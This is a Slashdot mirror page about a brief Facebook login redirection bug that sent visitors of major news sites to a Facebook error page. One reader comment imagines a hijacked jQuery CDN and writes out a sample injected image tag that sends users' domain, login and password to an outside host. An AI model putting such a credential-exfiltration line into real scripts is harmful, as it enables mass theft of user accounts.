Slashdot Mirror
Facebook Breaks Major Websites With Redirection Bug
johnsnails writes "Some of the biggest news sites in the world disappeared yesterday when Facebook took over the internet with a redirection bug. Visitors to sites such as The Washington Post, BuzzFeed, the Gawker network, NBC News and News.com.au were immediately transferred to a Facebook error page upon loading their intended site. It was fixed quickly, and Facebook provided this statement: 'For a short period of time, there was a bug that redirected people logging in with Facebook from third party sites to Facebook.com. The issue was quickly resolved, and Login with Facebook is now working as usual.'"
I shudder thinking what havoc you could cause if you'd manage to hijack one of big JS library CDNs.
For example, just imagine every copy of jQuery from Google's CDN also including instructions to add '<img src="http://buttfuck.me/lol?domain=$window.domain&login=$login&pass=$pass">' on clicking login button - even if it'd be up for just a few minutes, you'd still probably get millions of user accounts sent to you.
Economical impact would be huge, with thousands of sites scouring logs and resetting compromised logins and users having to check and reset every password.
Only a tiny minority is uses NoScript, and then some sites require scripts to function - so you should also use some tricks to replace them with locally cached versions. I really hope those CDN servers are in secure location with write access only for verified personnel physically present on site.